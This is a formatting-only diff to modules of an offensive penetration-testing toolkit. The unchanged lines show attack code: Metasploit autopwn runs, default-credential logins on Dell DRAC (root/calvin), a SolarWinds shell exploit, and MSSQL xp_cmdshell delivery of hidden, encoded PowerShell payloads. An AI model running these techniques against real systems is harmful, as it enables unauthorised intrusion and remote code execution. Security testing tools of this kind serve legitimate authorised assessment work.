{0} addition and encoding

src/fasttrack/autopwn.py

@@ -28,7 +28,7 @@ def prep(database, ranges):
         core.print_status("Using the {0} sql driver for autopwn".format(database))
         filewrite.write("db_driver {0}\r\n".format(database))
         core.print_status("Autopwn will attack the following systems: {0}".format(ranges))
-        filewrite.write("db_nmap {}\r\n".format(ranges))
+        filewrite.write("db_nmap {0}\r\n".format(ranges))
         filewrite.write("db_autopwn -p -t -e -r\r\n")
         filewrite.write("jobs -K\r\n")
         filewrite.write("sessions -l\r\n")

src/fasttrack/delldrac.py

@@ -1,4 +1,5 @@
 #!/usr/bin/env python
+# coding=utf-8
 
 ###########################################
 #
@@ -91,7 +92,7 @@ def login_drac(ipaddr_single):
                "Accept-Encoding": "gzip, deflate",
                "Connection": "keep-alive",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
-               "Referer": "https://{}/Applications/dellUI/login.htm".format(ipaddr_single),
+               "Referer": "https://{0}/Applications/dellUI/login.htm".format(ipaddr_single),
                "Content-Length": 63,
                "Cookie": "test=1; SessionLang=EN",
                "Pragma": "no-cache",
@@ -145,7 +146,7 @@ def login_chassis(ipaddr_single):
                "Accept-Encoding": "gzip, deflate",
                "Connection": "keep-alive",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
-               "Referer": "https://{}/cgi-bin/webcgi/login".format(ipaddr_single),
+               "Referer": "https://{0}/cgi-bin/webcgi/login".format(ipaddr_single),
                "Content-Length": 78}
 
     # request the page
@@ -159,7 +160,7 @@ def login_chassis(ipaddr_single):
             pass  # login failed
         # to many people logged in at a given time
         if 'Connection refused, maximum sessions already in use.' in data:
-            print(("{}[!]{} There are to many people logged but un: root and pw: calvin are legit on IP: {}".format(bcolors.YELLOW,
+            print(("{0}[!]{1} There are to many people logged but un: root and pw: calvin are legit on IP: {2}".format(bcolors.YELLOW,
                                                                                                                     bcolors.ENDC,
                                                                                                                     ipaddr_single)))
             global global_check3
@@ -167,7 +168,7 @@ def login_chassis(ipaddr_single):
 
         # successful guess of passwords
         if "/cgi-bin/webcgi/index" in data:
-            print("{}[*]{} Dell Chassis Compromised! username: root password: calvin for IP address: ".format(bcolors.GREEN,
+            print("{0}[*]{1} Dell Chassis Compromised! username: root password: calvin for IP address: {2}".format(bcolors.GREEN,
                                                                                                               bcolors.ENDC,
                                                                                                               ipaddr_single))
             global global_check4

src/fasttrack/exploits/__init__.py

@@ -0,0 +1 @@
+# coding=utf-8

src/fasttrack/exploits/solarwinds.py

@@ -128,7 +128,7 @@ print("[*] Triggering shell")
 post_params = urlencode({'loginState': loginstate, 'loginName': postpayload, 'password': password})
 opener.open("http://{0}:9000/LoginServlet".format(rhost), post_params.encode())
 opener.open("http://{0}:9000/{1}".format(rhost, filename))
-print("[*] Check your shell on {} {}\n".format(lhost, lport))
+print("[*] Check your shell on {0} {1}\n".format(lhost, lport))
 
 # 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111
 # 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100

src/fasttrack/mssql.py

@@ -216,7 +216,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
                         import pexpect
                         core.print_status("Starting the Metasploit listener...")
                         msf_path = core.meta_path()
-                        child2 = pexpect.spawn("{}-r {}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
+                        child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
                                                                         os.path.join(core.setdir, "meta_config")))
 
         # random executable name
@@ -237,7 +237,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
         if not port:
             port = "443"
 
-        core.update_options("PORT={}".format(port))
+        core.update_options("PORT={0}".format(port))
         core.update_options("POWERSHELL_SOLO=ON")
         core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
 
@@ -257,9 +257,9 @@ def deploy_hex2binary(ipaddr, port, username, password):
         with open(os.path.join(core.setdir, "x86.powershell")) as x86:
             x86 = x86.read()
 
-        x86 = "powershell -nop -window hidden -noni -EncodedCommand {}".format(x86)
+        x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
         core.print_status("If you want the powershell commands and attack, "
-                          "they are exported to {}".format(os.path.join(core.setdir, "reports/powershell")))
+                          "they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell")))
         with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:
             filewrite.write(x86)
 
@@ -286,7 +286,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
                 import pexpect
 
             core.print_status("Starting the Metasploit listener...")
-            child2 = pexpect.spawn("{} -r {}".format(os.path.join(msf_path, "msfconsole"),
+            child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
                                                      os.path.join(core.setdir, "reports/powershell/powershell.rc")))
             core.print_status("Waiting for the listener to start first before we continue forward...")
             core.print_status("Be patient, Metaploit takes a little bit to start...")
@@ -308,7 +308,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
         # read in the file 900 bytes at a time
         with open(os.path.join(core.setdir, 'payload.hex')) as fileopen:
             core.print_status("Dropping initial begin certificate header...")
-            conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {}.crt'".format(random_exe))
+            conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
             for data in fileopen.read(900).rstrip():
                 if not data:
                     continue
@@ -356,7 +356,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
     # we append more commands if option 1 is used
     if option == "1":
         core.print_status("Triggering the powershell injection payload... ")
-        sql_command = ("exec master..xp_cmdshell '{}'".format(powershell_command))
+        sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
         thread.start_new_thread(conn.execute_query, (sql_command,))
 
     # using the old method
@@ -415,7 +415,7 @@ def cmdshell(ipaddr, port, username, password, option):
         # if the command isnt empty
         elif cmd:
             # execute the command
-            mssql.sql_query("exec master..xp_cmdshell '{}'".format(cmd))
+            mssql.sql_query("exec master..xp_cmdshell '{0}'".format(cmd))
             # print the rest of the data
             mssql.printReplies()
             mssql.colMeta[0]['TypeData'] = 80 * 2

src/fasttrack/psexec.py

@@ -1,3 +1,4 @@
+# coding=utf-8
 #############################################
 #
 # Main SET module for psexec
@@ -84,7 +85,7 @@ try:
 
     with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
         x86 = fileopen.read()
-    x86 = "powershell -nop -window hidden -noni -EncodedCommand {}".format(x86)
+    x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
     core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell")))
     with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
         filewrite.write(x86)
@@ -112,8 +113,8 @@ try:
 
     # launch metasploit below
     core.print_status("Launching Metasploit.. This may take a few seconds.")
-    subprocess.Popen("{} -r {}".format(os.path.join(core.meta_path(), "msfconsole"),
-                                       os.path.join(core.setdir, "reports/powershell/powershell.rc")),
+    subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path(), "msfconsole"),
+                                         os.path.join(core.setdir, "reports/powershell/powershell.rc")),
                      shell=True).wait()
 
 # handle exceptions

src/fasttrack/ridenum.py

@@ -187,7 +187,7 @@ try:
             sid = check_user(ip, account)
             # if its false then cycle threw
             if not sid:
-                print("[!] Failed using account name: {}...Attempting another.".format(account))
+                print("[!] Failed using account name: {0}...Attempting another.".format(account))
             else:
                 # success! Break out of the loop
                 print("[*] Successfully enumerated SID account.. Moving on to extract via RID.\n")
@@ -220,7 +220,7 @@ try:
         if sid_names:
             for name in sid_names:
                 # print the sid
-                print("Account name: {}".format(name))
+                print("Account name: {0}".format(name))
                 # write the file out
                 filewrite.write(name + "\n")
 

src/fasttrack/sccm/__init__.py

@@ -0,0 +1 @@
+# coding=utf-8